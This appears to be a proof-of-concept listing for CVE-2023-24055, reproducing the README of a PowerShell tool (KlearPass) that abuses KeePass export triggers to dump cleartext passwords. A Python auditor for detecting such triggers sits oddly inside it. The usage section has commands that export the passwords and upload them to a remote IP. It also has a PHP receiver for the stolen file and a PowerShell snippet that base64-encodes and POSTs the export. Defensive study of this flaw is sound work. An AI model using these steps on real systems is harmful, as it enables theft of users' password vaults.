CVE-2023-24055 PoC — KeePass security vulnerability

Associated vulnerability

Title: KeePass security vulnerability (CVE-2023-24055)
Description: KeePass is an open-source password manager. KeePass versions 2.53 and earlier contain a security vulnerability: an attacker can obtain cleartext passwords by adding an export trigger.

Description

CVE-2023-24055 POC written in PowerShell.

Readme
![alt text](https://github.com/ATTACKnDEFEND/CVE-2023-24055-POC/blob/main/images/KLEARPASS.png)

## Disclaimer

This script is for educational and demonstration purposes only. The author does not endorse or condone the use of this script for any criminal or malicious activities and it should only be used where explicitly allowed with proper permission.

This script should be used with caution, as it will alter the KeePass configuration file and delete any previously configured triggers. Use of this script may result in unexpected behavior and potentially break the KeePass application. Use at your own risk.

## Introduction

This script demonstrates the **DISPUTED** vulnerability CVE-2023-24055 in KeePass through version 2.53 (in a default installation): an attacker with write access to the XML configuration file can obtain the cleartext passwords by adding an export trigger. Note that the vendor's position is that the password database is not intended to be secure against an attacker who has that level of access to the local PC.

References:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
- https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
- https://keepass.info/
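As a defensive counterpart to the mechanism described above, here is an added example (not code from the PoC repository or from KeePass) that audits a `KeePass.config.xml` for trigger definitions and flags any trigger action whose parameter names a file path or URL, which is where an exported copy of the database would be written. It assumes the `Configuration/Application/TriggerSystem/Triggers/Trigger` layout of a KeePass 2.x configuration file; the embedded sample config and every GUID in it are constructed placeholders, not KeePass's real type identifiers.

```python
"""Audit a KeePass.config.xml for trigger definitions that write data out.

Added example (not part of the PoC repository or of KeePass itself). It relies
on the element layout of a KeePass 2.x configuration file,
Configuration/Application/TriggerSystem/Triggers/Trigger, with Events,
Conditions and Actions beneath each Trigger. The sample config and every GUID
in it are constructed placeholders, not KeePass's real type identifiers.
"""
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample: a user-writable config with one trigger whose action
# carries a file path parameter, the shape an export trigger takes.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-GUID</Guid>
          <Name>Sync</Name>
          <Events>
            <Event>
              <TypeGuid>PLACEHOLDER-EVENT-TYPE</TypeGuid>
              <Parameters><Parameter>0</Parameter><Parameter /></Parameters>
            </Event>
          </Events>
          <Conditions />
          <Actions>
            <Action>
              <TypeGuid>PLACEHOLDER-ACTION-TYPE</TypeGuid>
              <Parameters>
                <Parameter>C:\\Windows\\Tasks\\export.txt</Parameter>
                <Parameter>KeePass XML (2.x)</Parameter>
                <Parameter /><Parameter />
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""

# Parameters that name a local/UNC path or a URL are where an exported copy
# of the database would end up.
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\\|/)")
URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def audit_triggers(config_xml: str) -> dict:
    """Return the trigger system state and one finding per trigger.

    'enabled' is None when the file has no TriggerSystem element at all.
    Each finding carries the trigger's name and GUID, its actions' TypeGuids
    and any action parameter that looks like an output location.
    """
    root = ET.fromstring(config_xml)
    ts = root.find("Application/TriggerSystem")
    if ts is None:
        return {"enabled": None, "triggers": []}
    enabled = (ts.findtext("Enabled") or "").strip().lower() == "true"
    findings = []
    for trig in ts.findall("Triggers/Trigger"):
        actions = []
        for act in trig.findall("Actions/Action"):
            params = [(p.text or "").strip() for p in act.findall("Parameters/Parameter")]
            targets = [p for p in params if PATH_RE.match(p) or URL_RE.match(p)]
            actions.append({"type_guid": act.findtext("TypeGuid") or "", "targets": targets})
        findings.append({
            "name": trig.findtext("Name") or "",
            "guid": trig.findtext("Guid") or "",
            "actions": actions,
            "writes_to_target": any(a["targets"] for a in actions),
        })
    return {"enabled": enabled, "triggers": findings}


def audit_file(path: str) -> dict:
    """Audit a configuration file on disk (KeePass writes it with a UTF-8 BOM)."""
    with open(path, encoding="utf-8-sig") as fh:
        return audit_triggers(fh.read())


def report(result: dict) -> str:
    """Render the audit as text: one line per trigger, output targets flagged."""
    lines = [f"trigger system enabled: {result['enabled']}",
             f"triggers defined: {len(result['triggers'])}"]
    for t in result["triggers"]:
        flag = "FLAG" if t["writes_to_target"] else "info"
        lines.append(f"[{flag}] {t['name']!r} ({t['guid']})")
        for a in t["actions"]:
            lines.append(f"    action {a['type_guid']} -> {', '.join(a['targets']) or '(no output target)'}")
    return "\n".join(lines)


if __name__ == "__main__":
    # Pass the path of a real KeePass.config.xml to audit it; without an
    # argument the constructed sample is audited.
    result = audit_file(sys.argv[1]) if len(sys.argv) > 1 else audit_triggers(SAMPLE_CONFIG)
    print(report(result))
```

Run it against the user's `KeePass.config.xml` (in a default installation the user-level copy lives under `%APPDATA%\KeePass`). For most users any trigger at all is unexpected, so every entry the audit lists deserves a look, and the flagged ones most of all. KeePass also reads an enforced configuration file, `KeePass.config.enforced.xml`, from its application directory, which an administrator can use to lock trigger settings so that a user-writable config cannot override them.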

## Instructions

To use this script, run it in PowerShell and provide the necessary parameters. The mandatory parameters are:

- `-filename`: The full path and name of the file to which the passwords will be exported.

The optional parameters are:

- `-uploadURL`: This switch is used to specify that the data should be uploaded to the specified URL.
- `-url`: The URL to which the data should be uploaded.

### Example Usage

Export cleartext passwords:

```powershell
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt
```

Export cleartext passwords and upload export to web server:

```powershell
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php
```

Detailed help:

```powershell
get-help .\KlearPass.ps1 -Detailed
```

### Example PHP script to upload file on webserver

```php
<?php
// Receives a POST with 'filename' and base64-encoded 'data' and writes the
// decoded content under the uploads directory.
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    // basename() keeps the written file inside $target_directory even when
    // the submitted name contains directory components.
    $filename = $target_directory . basename($_POST['filename']);
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>
```

### Example PowerShell script to test PHP upload

```powershell
$filename = "c:\windows\tasks\export.txt"
$file = [System.IO.Path]::GetFileName($filename)
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)))
# Base64 output contains '+', '/' and '=', which must be percent-encoded in a
# form-urlencoded body; otherwise '+' arrives as a space and the server-side
# base64_decode() produces corrupted data.
$body = "filename=" + [System.Uri]::EscapeDataString($file) + "&data=" + [System.Uri]::EscapeDataString($encodedFile)
$http = New-Object System.Net.WebClient
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded")
$http.UploadString("http://192.168.238.141/KeePass/upload.php", $body)
```

## Credits

- Script initially based on code found in https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
- Idea of exfiltrating the export is credited to https://github.com/alt3kx/CVE-2023-24055_PoC.
File snapshot

```
[4.0K] /data/pocs/57fc3e6d39ed9781666f7c59b3975b2c76d475b1
├── [4.0K] images
│   └── [ 17K] KLEARPASS.png
├── [6.5K] KlearPass.ps1
└── [3.0K] README.md

1 directory, 3 files
```